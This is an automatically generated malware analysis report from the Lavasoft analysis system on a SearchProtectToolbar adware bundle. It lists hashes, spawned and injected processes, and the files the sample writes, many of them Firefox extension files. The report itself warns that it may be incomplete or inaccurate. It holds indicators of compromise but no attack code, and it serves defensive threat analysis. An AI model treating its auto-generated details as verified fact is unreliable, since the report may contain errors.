SearchProtectToolbar_pcap_cbead634ba

by malwarelabrobot on April 20th, 2015 in Malware Descriptions.

SearchProtectToolbar_pcap.YR, mzpefinder_pcap_file.YR, SearchProtectToolbar.YR (Lavasoft MAS)
Behaviour: Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: cbead634babe14801c0b14d3517a10f8
SHA1: 27366ba803733af7947ca5dbe49725b3192f049b
SHA256: 8459bbf3e09f193ef7c9d1161964d06dace885c55a70855ed1262d295173b48e
SSDeep: 12288:CQiGHzL8 iDNdROwaopp0/oF9TXVQwR9qI1y9d0Rl7q3C8pJth:CQiq38DddRpawFBRn1y9d l7uh
Size: 657169 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: ?? 2014 ClientConnect Ltd.
Created at: 1992-06-20 01:22:17
Analyzed on: Windows7Ada SP1 64-bit


Summary:

Malware. Malware, short for malicious software, is any software used to disrupt computer operation, gather sensitive information, or gain access to private computer systems.

Payload

No specific payload has been found.

Process activity

The Malware creates the following process(es):

ProtectService.exe:4372
ProtectService.exe:4436
YTAHelper.exe:3196
install20087.exe:1292
ShopperPro.exe:3536
ProtectWindowsManager.exe:5076
ProtectWindowsManager.exe:5024
YouTubeAcceleratorService.exe:3544
YouTubeAcceleratorService.exe:3700
YouTubeAcceleratorService.exe:3308
bi.exe:2320
Hbiagmhjfvp.exe:3504
jsdrv.exe:3700
wpm_v20.0.0.1953_0302.exe:5000
cfeca700-7b58-4ebe-8806-aa3ea96213cd-4.exe:4516
45B6.tmp:3512
ins_yta.exe:3216
QQBrowser.exe:4888
QQBrowser.exe:3168
testlsp.exe:4312
01783b5d-40d7-41d4-9ba0-a7e585dc1505-4.exe:4404
powershell.exe:3812
powershell.exe:2532
powershell.exe:3740
setup.exe:1832
HPNotify.exe:4640
GLJ625B.tmp:3268
Bxaze.exe:1776
smt_istartsurf.exe:3284
cmdshell.exe:1988
Mniitruxnlcp.exe:3244
XTab_Setup2121.exe:1496
7za.exe:800
%original file name%.exe:2684
appshat.exe:3704
ins_shopperpro.exe:3608
GLB61FD.tmp:3224
regsvr32.exe:3240
regsvr32.exe:3888
regsvr32.exe:1808
regsvr32.exe:3320
regsvr32.exe:3964
regsvr32.exe:3060
lspinst.exe:3356
lspinst.exe:4156
webplayer_installer.exe:2708
YTAHEL~1.EXE:1600
appshat_generic.exe:3896
DCytaiesmt_smtyc_setup.exe:1064
DCytaiesmt_smtyc_setup.exe:3856
DCytaiesmt_smtyc_setup.exe:392
DCytaiesmt_smtyc_setup.exe:3172
DCytaiesmt_smtyc_setup.exe:2512
DCytaiesmt_smtyc_setup.exe:3640
cscript.exe:1372
spbiu.exe:3496
spbiu.exe:960
wscript.exe:4912
INS_SENSE.EXE:3844
19fa6da2-7e70-4168-ae8d-59d51e43be31-4.exe:4452
taskeng.exe:3412
ytaiesmt_smtyc_setup.exe:2128
cbead634babe14801c0b14d3517a10f8.tmp:2428
INS_IWEBAR.EXE:3836

The Malware injects its code into the following process(es):

YouTubeAcceleratorService.exe:3848
YouTubeAccelerator.exe:2288
Tetris.exe:1732
WebPlayer.exe:3488

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process ProtectService.exe:4436 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\ProgramData\IHProtectUpDate\update\conf (5 bytes)

The process YTAHelper.exe:3196 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\content\config.json (269 bytes)
C:\ProgramData\YTAHelper\config.json (269 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\content\overlay.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\content\overlay.xul (203 bytes)
C:\ProgramData\YTAHelper\yta_database1_0_0.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (514 bytes)
%Program Files% (x86)\YTAHelper\config.json (269 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\install.rdf (884 bytes)
C:\ProgramData\YTAHelper\YTAHelper.dll (2321 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\content\yta_database1_0_0.json (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\chrome.manifest (111 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\content\shopperpro_128.png (5 bytes)
C:\ProgramData\YTAHelper\YTAHelper64.dll (3073 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{4C59F3E5-BBD0-4344-8DD2-30866FA0B31E}\content\YTAHelper_64.png (4 bytes)

The process install20087.exe:1292 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT (864 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\ajax-bidl[1].htm (803 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\4a9fc2e26d3c3249b974ded373db7ae1[1].htm (27605 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.1 (6872 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.0 (6872 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.3 (6872 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.2 (6872 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.5 (6872 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.4 (6872 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.7 (6872 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe.6 (6872 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.7 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.6 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.5 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.4 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.3 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.2 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.1 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe.0 (2696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\smt_istartsurf.exe (49444 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe (71289 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp (33717 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\appshat_generic.exe (21724 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.2 (10864 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.3 (10864 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.0 (10864 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.1 (10864 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.6 (10864 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.7 (10864 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.4 (10864 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\ytaiesmt_smtyc_setup.exe.5 (10864 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.5 (4152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.4 (4152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.7 (4152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.6 (4152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.1 (4152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.0 (4152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.3 (4152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\45B6.tmp.2 (4152 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\HDZ3KS6S\tokyo_sprite_full[1].png (1276 bytes)

The process ShopperPro.exe:3536 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\ProgramData\ShopperPro\config.json (487 bytes)
C:\ProgramData\ShopperPro\ShopperPro.dll (2321 bytes)
%Program Files% (x86)\ShopperPro\config.json (1254 bytes)
%Program Files% (x86)\ShopperPro\JSDriver\jsdrv.exe (291 bytes)
%Program Files% (x86)\ShopperPro\JSDriver\1.42.0.1766\config.json (767 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.ini (514 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{746505DC-0E21-4667-97F8-72EA6BCF5EEF}\content\config.json (487 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{746505DC-0E21-4667-97F8-72EA6BCF5EEF}\content\database1_0_0.json (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{746505DC-0E21-4667-97F8-72EA6BCF5EEF}\install.rdf (828 bytes)
%Program Files% (x86)\ShopperPro\JSDriver\1.42.0.1766\jsdrv.exe (22786 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{746505DC-0E21-4667-97F8-72EA6BCF5EEF}\content\overlay.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{746505DC-0E21-4667-97F8-72EA6BCF5EEF}\content\overlay.xul (203 bytes)
%Program Files% (x86)\ShopperPro\JSDriver\1.42.0.1766\jsdrv.sys (52 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\extensions.json (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{746505DC-0E21-4667-97F8-72EA6BCF5EEF}\content\shopperpro_128.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\{746505DC-0E21-4667-97F8-72EA6BCF5EEF}\chrome.manifest (113 bytes)
C:\ProgramData\ShopperPro\database1_0_0.ej (14 bytes)
C:\ProgramData\ShopperPro\ShopperPro64.dll (3361 bytes)
%Program Files% (x86)\ShopperPro\JSDriver\1.42.0.1766\database1_0_0.ej (14 bytes)

The process ProtectWindowsManager.exe:5076 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\ProgramData\WindowsMangerProtect\update\conf (5 bytes)

The process YouTubeAcceleratorService.exe:3848 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Windows\Temp\SBCA9D9.tmp (51193 bytes)
C:\Windows\Temp\SBC9A5B.tmp (98 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\engine_3848_YouTubeAcceleratorService.log (246445 bytes)
C:\Windows\Temp\SBCA5A4.tmp (44 bytes)
%Program Files% (x86)\YouTube Accelerator\helper.dll (200 bytes)
C:\Windows\Temp\SBCA267.tmp (44 bytes)
C:\Windows\Temp\SBCA48A.tmp (98 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\config.xml (6731 bytes)
C:\Windows\Temp\SBCDAAA.tmp (547 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\YouTubeAcceleratorService_3848.log (787 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\va_conf.dat (706 bytes)
C:\ProgramData\TEMP:56E2E879 (240 bytes)
C:\Windows\Temp\SBC9F22.tmp (547 bytes)

The process YouTubeAcceleratorService.exe:3308 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

%Program Files% (x86)\YouTube Accelerator\engine.dll (146 bytes)
%Program Files% (x86)\YouTube Accelerator\ipc.dll (286 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\config.xml (60 bytes)
%Program Files% (x86)\YouTube Accelerator\xmldb.dll (192 bytes)

The process bi.exe:2320 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\nsExec.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31E9.tmp (25302 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\7za.exe (20181 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\[RANDOM_STRING].7z (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsi31EA.tmp\install20087.exe (200 bytes)

The process Hbiagmhjfvp.exe:3504 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\dogolylzg.dll (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\sfseclo.dll (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\novufxv.dll (14 bytes)
%Program Files% (x86)\SensePlus\19fa6da2-7e70-4168-ae8d-59d51e43be31-5.exe (7433 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\rblyvufer.dll (23 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\System.dll (808 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\163912 (94253 bytes)
%Program Files% (x86)\SensePlus\19fa6da2-7e70-4168-ae8d-59d51e43be31-4.exe (9654 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\gpuiqgk.dll (13 bytes)
%Program Files% (x86)\SensePlus\utils.exe (80855 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp (4 bytes)
%Program Files% (x86)\SensePlus\19fa6da2-7e70-4168-ae8d-59d51e43be31.xpi (2321 bytes)
C:\Windows\Tasks\19fa6da2-7e70-4168-ae8d-59d51e43be31-5_user.job (74 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\tyhdzuw.dll (3730 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\449656 (3389 bytes)
C:\Windows\Tasks\19fa6da2-7e70-4168-ae8d-59d51e43be31-5.job (74 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\19fa6da2-7e70-4168-ae8d-59d51e43be31-4.dll (49631 bytes)
%Program Files% (x86)\SensePlus\Uninstall.exe (601 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\installer.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\ghcrjjq.dll (31236 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsdCABE.tmp (599749 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JUC72OXY\ipgeoapi_com[1].json (40 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsyCAEE.tmp\wwrumuo.dll (30 bytes)

The process YouTubeAccelerator.exe:2288 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD9E5.tmp (1 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\engine_3848_YouTubeAcceleratorService.log_tmp (48 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD708.tmp (1 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\trial_now_accelerating.mht (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\SMALLTEST[1].htm (70 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD627.tmp (50 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\config.xml (873 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\premium_video_accelerator.mht (38 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\dl_update.mht (30 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\va_off.mht (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD606.tmp (682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD9D4.tmp (1 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\itunesmessage.mht (22 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\silenttestsucceeded.mht (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD64B.tmp (1 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\now_accelerating.mht (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD796.tmp (1 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\hd_disabled.mht (22 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\YouTubeAccelerator_2288.log (78482 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD982.tmp (1 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\video_accelerator.mht (38 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\exiting.mht (22 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\engine_4312_testlsp.log_tmp (22 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\silenttestfailed.mht (22 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\premium_now_accelerating.mht (30 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\oem_video_accelerator.mht (38 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\blank.html (97 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\YouTubeAccelerator_2288.log_tmp (14 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\trial_video_accelerator.mht (38 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\helper_4312_testlsp.log_tmp (151 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\update.mht (31 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\testlsp_4312.log_tmp (825 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\test.mht (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD639.tmp (1 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\LspCommTest.zip (178944 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\activation_offline.mht (22 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\noupdates.mht (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD8D0.tmp (242 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\ipc_4312_testlsp.log_tmp (999 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\trialexp_video_accelerator.mht (38 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD970.tmp (50 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\va_on.mht (22 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\YouTubeAcceleratorService_3848.log_tmp (591 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\olddriver.mht (22 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\tweetmessage.mht (22 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\activation_expired.mht (22 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\restart.mht (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD9C2.tmp (1 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Res\VARes_1000008\acceleration_not_supported.mht (22 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD2F8.tmp (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6HVGFTJ0\wbkD93F.tmp (682 bytes)
C:\Users\Public\Documents\GOOBZO\YouTube Accelerator\Log\engine_1064_DCytaiesmt_smtyc_setup.log_tmp (3 bytes)

The process jsdrv.exe:3700 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\Public\Documents\ShopperPro\JsDriver\Config.xml (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Windows\Cookies\WU77T6AT.txt (136 bytes)

The process wpm_v20.0.0.1953_0302.exe:5000 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\ProgramData\WindowsMangerProtect\ProtectWindowsManager.exe (3568 bytes)

The process cfeca700-7b58-4ebe-8806-aa3ea96213cd-4.exe:4516 makes changes in the file system.
The Malware creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\ede79d5503f43d1b03df92e314e15609.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\32284aebffd1790c1af676ef22740ce5.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\354.js (5118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\browser.xul (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\dialog.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\64.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\1ed696713cb385de94f9ad390d934449.js (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\011a7eceebbcaea9dbfadd01c13eb2c4.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\userCode\extension.js (31 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\182.js (30 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\644e97ce391c93f6995ef050eb225474.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\panelarrow-up.png (921 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\background.html (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\177.js (816 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\f6183e248f78c800cbdfa526ab0ba72c.js (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\16.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\api\9486f296f7dae2528277c439e3027a17.js (357 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\253.js (741 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\28.js (506 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\skin\icon48.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\419197bd416002adc9482518113c154c.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\ca13f04cc2c7a348e3822e7a3b984ef9.js (804 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\chrome\content\core\55b6e594d9a65c5813055e2c7a9e8e9b.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\defaults\preferences\prefs.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Mozilla\Firefox\Profiles\zwvbr04l.default\Extensions\[email protected]\extensionData\plugins\72.js (1601 bytes)
